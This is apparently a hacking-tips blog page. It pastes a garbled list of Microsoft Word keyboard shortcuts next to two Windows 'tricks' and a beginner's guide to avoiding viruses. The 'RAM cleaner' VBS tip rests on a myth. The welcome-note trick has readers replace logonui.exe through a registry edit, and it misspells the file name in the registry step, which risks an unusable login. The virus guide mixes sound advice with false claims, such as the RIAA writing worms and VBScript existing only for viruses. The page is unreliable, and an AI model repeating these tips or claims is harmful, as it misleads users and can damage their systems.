Command Name Modifiers Key Menu About Help Accept All Changes in Doc Accept Accept All Changes Shown Accept All Caps Ctrl+Shift+ A Annotation Alt+Ctrl+ M Insert App Maximize Alt+ F10 App Restore Alt+ F5 Apply Heading1 Alt+Ctrl+ 1 Apply Heading2 Alt+Ctrl+ 2 Apply Heading3 Alt+Ctrl+ 3 Apply List Bullet Ctrl+Shift+ L Arrange All Window Auto Correct Tools Auto Format Alt+Ctrl+ K Auto Format Begin Format Auto Summarize Begin Tools Auto Text F3 Auto Text Alt+Ctrl+ V Background Fill Effect Format Background Background More Colors Format Background Background Watermark Format Background Bold Ctrl+ B Bold Ctrl+Shift+ B Bookmark Ctrl+Shift+ F5 Insert Bookshelf Lookup Reference Tools Break Insert Browse Next Ctrl+ Page Down Browse Prev Ctrl+ Page Up Browse Sel Alt+Ctrl+ Home Busu Language Cancel Esc Center Para Ctrl+ E Change Case Format Change Case Shift+ F3 Changes View Char Left Left Char Left Extend Shift+ Left Char Right Right Char Right Extend Shift+ Right Checkin File Checkout File Clear Del Clear Clear Formatting Clear Close or Exit Alt+ F4 Close Pane Alt+Shift+ C Column Break Ctrl+Shift+ Return Column Select Ctrl+Shift+ F8 Copy Ctrl+ C Copy Ctrl+ Insert Copy Format Ctrl+Shift+ C Copy Text Shift+ F2 Create Auto Text Alt+ F3 Cross Reference Reference Menu Customize Tools Customize Add Menu Shortcut Alt+Ctrl+ = Customize Keyboard Shortcut Alt+Ctrl+ Num + Customize Remove Menu Shortcut Alt+Ctrl+ -Cut Ctrl+ X Cut Shift+ Del Date Field Alt+Shift+ D Date Time Insert Delete All Comments in Doc Reject Delete All Comments Shown Reject Delete Back Word Ctrl+ Backspace Delete Table Toolbar 32780 Delete Word Ctrl+ Del Distribute Para Ctrl+Shift+ J Do Field Click Alt+Shift+ F9 Doc Close Ctrl+ W Doc Close Ctrl+ F4 Doc Maximize Ctrl+ F10 Doc Move Ctrl+ F7 Doc Restore Ctrl+ F5 Doc Size Ctrl+ F8 Doc Split Alt+Ctrl+ S Window Double Underline Ctrl+Shift+ D Draw Snap to Grid Draw End of Column Alt+ Page Down End of Column Alt+Shift+ Page Down End of Doc Extend Ctrl+Shift+ End End of Document Ctrl+ End End of Line End End of Line Extend Shift+ End End of Row Alt+ End End of Row Alt+Shift+ End End of Window Alt+Ctrl+ Page Down End of Window Extend Alt+Ctrl+Shift+ Page Down Endnote Now Alt+Ctrl+ D Envelope Wizard Letters and Mailings Menu EServices Tools Exit File Extend Selection F8 Field Insert Field Chars Ctrl+ F9 Field Codes Alt+ F9 Find Ctrl+ F Fix Broken Text Tools Fix Me Help Font Ctrl+ D Font Ctrl+Shift+ F Font Size Select Ctrl+Shift+ P Footnote Now Alt+Ctrl+ F Footnotes View Formatting Properties Format Formula Table Frameset Wizard Frames Menu Go Back Shift+ F5 Go Back Alt+Ctrl+ Z Go To Ctrl+ G Edit Go To F5 Edit Grow Font Ctrl+Shift+ . Grow Font One Point Ctrl+ ] Hanging Indent Ctrl+ T Hanja Dictionary Language Header View Header Footer Link Alt+Shift+ R Headings Table Help F1 HHC Language Hidden Ctrl+Shift+ H HTMLSource View Hyperlink Ctrl+ K Hyphenation Language Indent Ctrl+ M Index and Tables Reference Menu Insert Column Toolbar 32782 Insert Column Right Toolbar 32782 Insert Row Above Toolbar 32782 Insert Row Below Toolbar 32782 Italic Ctrl+ I Italic Ctrl+Shift+ I Justify Para Ctrl+ J Language Language Left Para Ctrl+ L Letter Properties Letters and Mailings Menu Letters Wizard JToolbar Letters and Mailings Menu License Verification Help Line Down Down Line Down Extend Shift+ Down Line Up Up Line Up Extend Shift+ Up Links Edit List Num Field Alt+Ctrl+ L Lock Fields Ctrl+ 3 Lock Fields Ctrl+ F11 Macro Alt+ F8 Mail Merge Check Alt+Shift+ K Mail Merge Edit Data Source Alt+Shift+ E Mail Merge to Doc Alt+Shift+ N Mail Merge to Printer Alt+Shift+ M Mail Merge Toolbar Letters and Mailings Menu Mail Merge Wizard Letters and Mailings Menu Mark Citation Alt+Shift+ I Mark Index Entry Alt+Shift+ X Mark Table of Contents Entry Alt+Shift+ O Menu Mode F10 Menu Show Reviewers Show Markup Merge Field Alt+Shift+ F Merge Revisions Tools M*cro$oft Script Editor Alt+Shift+ F11 M*cro$oft System Info Alt+Ctrl+ F1 Move Text F2 New Ctrl+ N File New Window Window Next Cell Tab Next Field F11 Next Field Alt+ F1 Next Misspelling Alt+ F7 Next Object Alt+ Down Next Window Ctrl+ F6 Next Window Alt+ F6 Normal Alt+Ctrl+ N View Normal Style Ctrl+Shift+ N Normal Style Alt+Shift+ Clear (Num 5) Number Insert Object Insert Office Clipboard Edit Office On The Web Help Online Meeting Online Collaboration Open Ctrl+ O Open Ctrl+ F12 Open Alt+Ctrl+ F2 Open or Close Up Para Ctrl+ 0 Options Tools Other Pane F6 Other Pane Shift+ F6 Outline Alt+Ctrl+ O Outline Collapse Alt+Shift+ -Outline Collapse Alt+Shift+ Num -Outline Demote Alt+Shift+ Right Outline Expand Alt+Shift+ = Outline Expand Alt+Shift+ Num + Outline Master View Outline Move Down Alt+Shift+ Down Outline Move Up Alt+Shift+ Up Outline Promote Alt+Shift+ Left Outline Show First Line Alt+Shift+ L Overtype Insert Page Alt+Ctrl+ P View Page Break Ctrl+ Return Page Down Page Down Page Down Extend Shift+ Page Down Page Field Alt+Shift+ P Page Numbers Insert Page Up Page Up Page Up Extend Shift+ Page Up Para Down Ctrl+ Down Para Down Extend Ctrl+Shift+ Down Para Up Ctrl+ Up Para Up Extend Ctrl+Shift+ Up Paste Ctrl+ V Paste Shift+ Insert Paste As Hyperlink Edit Paste Format Ctrl+Shift+ V Paste Special Edit Postcard Wizard Letters and Mailings Menu Present It Send To Prev Cell Shift+ Tab Prev Field Shift+ F11 Prev Field Alt+Shift+ F1 Prev Object Alt+ Up Prev Window Ctrl+Shift+ F6 Prev Window Alt+Shift+ F6 Print Ctrl+ P Print Ctrl+Shift+ F12 Print Preview Ctrl+ F2 Print Preview Alt+Ctrl+ I Proofing F7 Properties File Protect Unprotect Document Tools Record Macro Toggle Macro Redo Alt+Shift+ Backspace Redo or Repeat Ctrl+ Y Edit Redo or Repeat F4 Edit Redo or Repeat Alt+ Return Edit Reject All Changes in Doc Reject Reject All Changes Shown Reject Repeat Find Shift+ F4 Repeat Find Alt+Ctrl+ Y Replace Ctrl+ H Edit Reset Char Ctrl+ Space Reset Char Ctrl+Shift+ Z Reset Para Ctrl+ Q Revision Marks Toggle Ctrl+Shift+ E Right Para Ctrl+ R Save Ctrl+ S Save Shift+ F12 Save Alt+Shift+ F2 Save As F12 File Save As Web Page File Schedule Meeting Online Collaboration Select All Ctrl+ A Edit Select All Ctrl+ Clear (Num 5) Edit Select All Ctrl+ Num 5 Edit Select Cell Toolbar 32778 Select Column Toolbar 32778 Select Row Toolbar 32778 Select Table Alt+ Clear (Num 5) Toolbar 32778 Send For Review Send To Send to Fax Send To Send to Online Meeting Participants Send To Show All Ctrl+Shift+ 8 Show All Headings Alt+Shift+ A Show All Headings Alt+Shift+ A Show Comments Show Markup Show Formatting Show Markup Show Heading1 Alt+Shift+ 1 Show Heading2 Alt+Shift+ 2 Show Heading3 Alt+Shift+ 3 Show Heading4 Alt+Shift+ 4 Show Heading5 Alt+Shift+ 5 Show Heading6 Alt+Shift+ 6 Show Heading7 Alt+Shift+ 7 Show Heading8 Alt+Shift+ 8 Show Heading9 Alt+Shift+ 9 Show Hide Help Show Insertions and Deletions Show Markup Shrink Font Ctrl+Shift+ , Shrink Font One Point Ctrl+ [ Shrink Selection Shift+ F8 Sign Out of Passport File Small Caps Ctrl+Shift+ K Sort Table Sound Comments Space Para1 Ctrl+ 1 Space Para15 Ctrl+ 5 Space Para2 Ctrl+ 2 Speech Tools Spike Ctrl+Shift+ F3 Spike Ctrl+ F3 Split Table Start of Column Alt+ Page Up Start of Column Alt+Shift+ Page Up Start of Doc Extend Ctrl+Shift+ Home Start of Document Ctrl+ Home Start of Line Home Start of Line Extend Shift+ Home Start of Row Alt+ Home Start of Row Alt+Shift+ Home Start of Window Alt+Ctrl+ Page Up Start of Window Extend Alt+Ctrl+Shift+ Page Up Style Ctrl+Shift+ S Style Separator Alt+Ctrl+ Return Subscript Ctrl+ = Superscript Ctrl+Shift+ = Symbol Insert Symbol Font Ctrl+Shift+ Q Tabs Format Templates Tools Theme Format Thesaurus Shift+ F7 Language Time Field Alt+Shift+ T Toggle Character Code Alt+ X Toggle Field Display Shift+ F9 Toggle Master Subdocs Ctrl+ \Tool Shift+ F1 Toolbars View Translate Pane Alt+Shift+ F7 Language Un Hang Ctrl+Shift+ T Un Indent Ctrl+Shift+ M Underline Ctrl+ U Underline Ctrl+Shift+ U Undo Ctrl+ Z Undo Alt+ Backspace Unlink Fields Ctrl+ 6 Unlink Fields Ctrl+Shift+ F9 Unlock Fields Ctrl+ 4 Unlock Fields Ctrl+Shift+ F11 Update Auto Format Alt+Ctrl+ U Update Fields F9 Update Fields Alt+Shift+ U Update Source Ctrl+Shift+ F7 VBCode Alt+ F11 Versions File Web View Web Component Insert Web Go Back Alt+ Left Web Go Forward Alt+ Right Web Page Preview File Wizard Table Word Count Tools Word Count List Ctrl+Shift+ G Word Count Recount Ctrl+Shift+ R Word Left Ctrl+ Left Word Left Extend Ctrl+Shift+ Left Word Perfect Help Help Word Right Ctrl+ Right Word Right Extend Ctrl+Shift+ Right Word Underline Ctrl+Shift+ W

Clean Your Ram Trough Notepad

U may recognize that ur system gets slower and slower when playing and working a lot with ur pc. That's cause ur RAM is full of remaining progress pieces u do not need any more.

So create a new text file on ur desktop and name it "RAMcleaner"

Type

FreeMem=Space(64000000) in this file and save it as RAMcleaner.vbs [ You may choose the "All Files" option when u save it ]

Run the file and ur RAM may be cleaned :> Of course u can edit the code in the file for a greater "cleaning-progress". For example: FreeMem=Space(1280000000)

How to change windows X.P welcome note

1. First of all you need to download Resource Hacker that will open file to download it free just goto link blow it is a useful software you can do many other thing by using this software and it can be used in many useful tricks http://www.angusj.com/resourcehacker/

2. After downloading it and uncompressing it just open its folder then run it then go to file then open this file c:\windows\system32\logonui.exe

3. After opening this file you will see four folders there

ULFILE Bitmap String Table Version Info Just click on + sign of "String Table" then go to 1 after clicking on 1 you will see "1033"

4. Click on "1033" on right site programing will open. Now find 7, "welcome"

5. Change the welcome to your note like 7, "www.freeshadow.tk" then save as it with name shadow.exe

6. Now click on start and open run and then write their regedit

7. After this go to this "HKEY_LOCAL_MACHINE\SOFTWARE\Micr osoft\Windows NT\CurrentVersion\Winlogon"

8. On right side you will see "logonuni.exe"

9. Final step replace it with shadow.exe or chane it to shadow.exe

User's guide to avoiding virus infections

User's guide to avoiding virus infections Keeping an eye out for viruses

Computer viruses are everywhere! This guide will show you how to stay alert and how to avoid getting infections on your computer. Having an updated virus scanner is only a small part of this, there are many ways that you can prevent having viruses other than a virus scanner, as it will not always save you.

Types of viruses There are many type of viruses. Typical viruses are simply programs or scripts that will do various damage to your computer, such as corrupting files, copying itself into files, slowly deleting all your hard drive etc. This depends on the virus. Most viruses also mail themselves to other people in the address book. This way they spread really fast and appear at others' inboxes as too many people still fall for these. Most viruses will try to convince you to open the attachment, but I have never got one that tricked me. In fact, I found myself emailing people just to make sure they really did send me something. It does not hurt to be safe.

Worms Worms are different type of viruses, but the same idea, but they are usually designed to copy themselves a lot over a network and usually try to eat up as much bandwidth as possible by sending commands to servers to try to get in. The code red worm is a good example of this. This worm breaks in a security hole in Microsoft IIS (Internet Information Server) in which is a badly coded http server that, despite the security risks, a lot of people use it. When the worm successfully gets in, it will try to go into other servers from there. When IceTeks was run on a dedicated server at my house, there was about 10 or so attempts per day, but because we ran Apache, the attempts did not do anything but waste bandwidth and not much as I had it fixed a special way. Some worms such as the SQL slammer will simply send themselves over and over so many times that they will clog up networks, and sometimes all of the internet. Worms usually affect servers more than home users, but again, this depends on what worm it is. It is suspected that most worms are efforts from the RIAA to try to stop piracy, so they try to clog up networks that could contain files. Unfortunately, the RIAA have the authority to do these damages and even if caught, nothing can be done.

Trojans Trojans are another type of virus. They are simply like a server in which enables hackers to get into and control the computer. A trojan such as Subseven can enable a hacker to do various things such as control the mouse, eject the cd-rom drive, delete/download/upload files and much more.

MBR virues Boot sector viruses are another type, they are similar to file viruses, but instead they go in the boot sector and can cause serious damage when the computer is booted, some can easily format your drive simply by booting your computer. These are hard to remove.

Most viruses have various characteristics. For example, a worm can also be a trojan and also infect the boot sector. It all depends on how the virus is written and what it is designed to do. That's why there are not really strong structured categories, as they can easily mix one in the other.

Know the potentially dangerous files Like any other files, viruses must be opened in order to do something. Most viruses come through e-mail as an attachment. Some will make it look like it's someone you know, and it will try to convince you to open an attachment. Never open attachments at any cost! Some viruses will infect files in programs, so opening a program will actually open the virus, maybe the same one, or another part of it.

All files have what is called an extension; This is the 3 last letters after the last period. For example, setup.exe has a file extension of .exe.

Extensions to watch out for are .exe .com .bat .scr .pif .vbs and others, but these are the most seen. .exe .com .bat .pif and .scr are valid extensions for executables. A virus writer will simply rename it to one of these and it will work the same way. .pif is a shortcut to an ms-dos program and will have the ms dos icon, but will still execute whatever code is in it, so an .exe can be renamed to .pif and be run the same way. .bat is a batch file, which can contain instructions to do various file activities, but again, a .exe can be renamed to .bat and it will execute it! .vbs is a visual basic script. For some reason, Microsoft provides this scripting language along with the scripting host to make it more convenient to design and write viruses quickly and easily, I've never seen another use for this scripting language other than for writing viruses. There are programs that are written with that language, but it is compiled into an exe. Exe is the usual extension for programs, you would not have a software CD install a bunch of vbs files all over!

Bottom line is, if you don't know what a file is just don't open it. Some viruses will sometimes be named a way as to mask the real file extension to make it look like a harmless file such as a image file. This is easily noticed, but can still be missed. Simply don't open unexpected files.

If you get something that appears like something legit, just ask the person it came from if they sent it. Most viruses use a friend's address to make it look like it comes from them. The virus does this by using the person's address when sending itself to the address book contacts.

Downloads Email is not the only way to get viruses; P2P (file sharing programs such as kazaa, winmx, direct connect etc) is also another way to get viruses.

When downloading programs, the main thing to watch out for is the file size. If you are downloading a program that you expect to be rather large such as a game, don't grab a file that is 10KB, since it's most likely a virus. However, I've been caught with a virus even with large files, so file size is not the only thing to watch, as an exe is still valid even if junk is added at the end, so a 64KB virus will still function even if it is turned into 650MB.

Icons are something to look for too, fortunately, virus writers don't take time to put icons. If your download should be a setup file, you should see the icon of a setup file. If it's just the blank icon that typical plain or corrupted exes have, don't open it.

Another thing to do, which should be obvious, is to scan the file for viruses using updated virus definitions. But don't rely on only your virus scanner, as they are not perfect, and if the virus has not been reported to them yet, they won't know to create a definition for it!

Changing settings to stay safe If you do open a virus, you want to avoid it going to all your friends. The simplest thing to do is to NOT use the windows address book. It is easy for viruses to get through and Microsoft is not doing anything about it. Just don't use it. Put them in spreadsheet or even better write them down somewhere. Don't use the address book.

Another "feature" to avoid is the auto preview. Some viruses can attempt to open themselves just by opening the email. There are security holes in Microsoft mail programs that allow this. In Microsoft Outlook, click on the view menu and remove auto preview. You need to do this for every folder, but the inbox is most important. In Outlook Express, click on the view menu and go to layout. In the dialog box, you will see a check box for show preview pane. Uncheck it and click ok.

Another thing you should change, especially if you download a lot, is the option that allows you to view the file extension. In Win98, go in any folder, click on view then folder options and choose the view tab and where it says hide file extension for known types, uncheck it. In win2k, it is the same process, but instead, go in the control panel and open the folder options icon.

Avoiding server worms Some viruses, mostly worms, can exploit through servers and affect other servers from servers that have been infected. A good example is the SQL slammer. This was a worm that affected SQL servers run by Microsoft IIS and Microsoft SQL Server. Once the worm gets in, that particular server starts trying to find more exploitable driving internet connections to a halt in the process. Servers running Apache were unaffected by that, except for the many hits to try to get in. IceTeks received about 100 hits per day when it was run on a dedicated home server. Most hits came from major ISPs and other big websites that had no clue they were still affected.

The simple solution to avoid these types of viruses is to NOT use Microsoft based server software for your server, especially if it is a public server. The operating system is also crucial, but the actual server software is much more. Apache, which is free, is much more secure than Microsoft based server programs such as IIS. IIS may be easier to understand and administer, but it saves a lot of hassle to learn how to use Apache. IIS has a large number of vulnerabilities, such as the ability to gain access to cmd.exe and basically delete the whole drive by doing a ../ request in the address bar. These don't require viruses, but simply commands, but there are worms written to automatically make these commands. The code red does this.

Removing a virus The best way to do this is to do a clean install. However, depending on how bad the virus is, a simple clean install won't remove it. So to be extra sure, you'll want to do a low level format. This is especially true of you got a boot sector virus, as even repartitioning and formatting won't quite remove it, but sometimes you can get away with an fdisk /mbr, but not all the time. here are various removal tools for viruses, it is good to use them and see if they work, but proceeding with the clean install is recommended. You never know if the virus is completely removed by deleting files you suspect are infected. Some viruses such as the Bugbear will close anti virus programs and other programs to make it hard and annoying to figure out what to do. A clean install is the best way to ensure that it's gone for good.

Viruses are out there, don't be one of the many infected ones! Stay alert and stay safe! Don't open unexpected files, regularly update your virus definitions and scan downloaded files!

I hope this article was useful for you!

Blog Archive

Contact Us

About Us

Privacy Policy

Copyright © The Way oF HacKeRs....! | Powered by Blogger
Design by Crackiapps | Blogger Template by Crackiapps.blogspot.com